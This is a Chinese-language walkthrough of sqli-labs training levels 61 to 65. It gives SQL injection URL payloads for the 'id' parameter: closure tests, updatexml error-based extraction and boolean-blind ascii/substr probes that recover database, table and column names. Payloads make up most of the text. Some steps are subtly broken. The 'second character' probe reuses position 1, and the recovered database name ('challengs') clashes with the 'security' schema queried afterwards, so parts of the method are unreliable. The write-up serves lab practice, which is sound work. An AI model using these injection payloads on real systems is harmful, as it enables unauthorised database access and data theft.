sqli-labs靶场通关攻略（六十一关到六十五关）

sqli-labs-master靶场第六十一关

步骤一，判断闭合方式

?id=1')) --+

步骤二，查看数据库

?id=1')) and updatexml(1,concat(1,(select database())),1) --+

步骤三，查看表名

?id=-1')) and updatexml(1,concat(1,(select group_concat(table_name)from information_schema.tables where table_schema='security')),1) --+

步骤四，查看users表中列名

?id=1')) and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) --+

sqli-labs-master靶场第六十二关

步骤一，判断闭合方式

?id=1') --+

步骤二，查看数据库

判断数据库的第一个字符：

用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于98 页面显示正常 说明数据库第一位字符ascii码大于98

?id=1') and ascii(substr(database(),1,1))>98--+

判断数据库第一位字符的ascii码是否大于99 页面显示异常 说明不大于 大于98不大于99 说明第一位字符ascii码等于99

?id=1') and ascii(substr(database(),1,1))>99--+

判断数据库的第二个字符：

用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于103 页面显示正常 说明数据库第二位字符ascii码大于103

?id=1') and ascii(substr(database(),1,1))>103--+

判断数据库第一位字符的ascii码是否大于104页面显示异常 说明不大于 大于103不大于104 说明第二位字符ascii码等于104

?id=1') and ascii(substr(database(),1,1))>104--+

以此类推...最终得出challengs

步骤三，查看表名

查security数据库中第一张表的第一位字符

用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于100 页面显示正常 说明数据库第一位字符ascii码大于100

?id=1') and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100--+

判断数据库第一位字符的ascii码是否大于101 页面显示异常 说明不大于 大于100不大于101 说明第一位字符ascii码等于101

?id=1') and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>101--+

大于100不大于101 说明第一张表的第一位字符等于101 'e'

以此类推...最终得出第一张表的表名为emails

步骤四，查看users表中列名

查看users表中第一个字段的第一位字符

?id=1') and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))>104--+

?id=1') and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))>105--+

说明users表的第一个字段的第一位字符ascii码为105 'i'

以此类推...最终得出users表的第一个字段为id

sqli-labs-master靶场第六十三关

步骤一，判断闭合方式

?id=1'  --+

步骤二，查看数据库

判断数据库的第一个字符：

用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于98 页面显示正常 说明数据库第一位字符ascii码大于98

?id=1' and ascii(substr(database(),1,1))>98--+

判断数据库第一位字符的ascii码是否大于99 页面显示异常 说明不大于 大于98不大于99 说明第一位字符ascii码等于99

?id=1' and ascii(substr(database(),1,1))>99--+

以此类推...最终得出challengs

步骤三，查看表名

查security数据库中第一张表的第一位字符

用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于100 页面显示正常 说明数据库第一位字符ascii码大于100

?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100--+

判断数据库第一位字符的ascii码是否大于101 页面显示异常 说明不大于 大于100不大于101 说明第一位字符ascii码等于101

?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>101--+

大于100不大于101 说明第一张表的第一位字符等于101 'e'

以此类推...最终得出第一张表的表名为emails

步骤四，查看users表中列名

查看users表中第一个字段的第一位字符

?id=1' and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))>104--+

?id=1' and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))>105--+

说明users表的第一个字段的第一位字符ascii码为105 'i'

以此类推...最终得出users表的第一个字段为id

sqli-labs-master靶场第六十四关

步骤一，判断闭合方式

?id=1))  --+

步骤二，查看数据库

判断数据库的第一个字符：

用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于98 页面显示正常 说明数据库第一位字符ascii码大于98

?id=1)) and ascii(substr(database(),1,1))>98--+

判断数据库第一位字符的ascii码是否大于99 页面显示异常 说明不大于 大于98不大于99 说明第一位字符ascii码等于99

?id=1)) and ascii(substr(database(),1,1))>99--+

以此类推...最终得出challengs

步骤三，查看表名

查security数据库中第一张表的第一位字符

用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于100 页面显示正常 说明数据库第一位字符ascii码大于100

?id=1)) and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100--+

判断数据库第一位字符的ascii码是否大于101 页面显示异常 说明不大于 大于100不大于101 说明第一位字符ascii码等于101

?id=1)) and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>101--+

大于100不大于101 说明第一张表的第一位字符等于101 'e'

以此类推...最终得出第一张表的表名为emails

步骤四，查看users表中列名

查看users表中第一个字段的第一位字符

?id=1)) and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))>104--+

?id=1)) and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))>105--+

说明users表的第一个字段的第一位字符ascii码为105 'i'

以此类推...最终得出users表的第一个字段为id

sqli-labs-master靶场第六十五关

步骤一，判断闭合方式

?id=1")  --+

步骤二，查看数据库

判断数据库的第一个字符：

用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于98 页面显示正常 说明数据库第一位字符ascii码大于98

?id=1") and ascii(substr(database(),1,1))>98--+

判断数据库第一位字符的ascii码是否大于99 页面显示异常 说明不大于 大于98不大于99 说明第一位字符ascii码等于99

?id=1") and ascii(substr(database(),1,1))>99--+

以此类推...最终得出challengs

步骤三，查看表名

查security数据库中第一张表的第一位字符

用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于100 页面显示正常 说明数据库第一位字符ascii码大于100

?id=1") and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100--+

判断数据库第一位字符的ascii码是否大于101 页面显示异常 说明不大于 大于100不大于101 说明第一位字符ascii码等于101

?id=1") and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>101--+

大于100不大于101 说明第一张表的第一位字符等于101 'e'

以此类推...最终得出第一张表的表名为emails

步骤四，查看users表中列名

查看users表中第一个字段的第一位字符

?id=1") and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))>104--+

?id=1") and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))>105--+

说明users表的第一个字段的第一位字符ascii码为105 'i'

以此类推...最终得出users表的第一个字段为id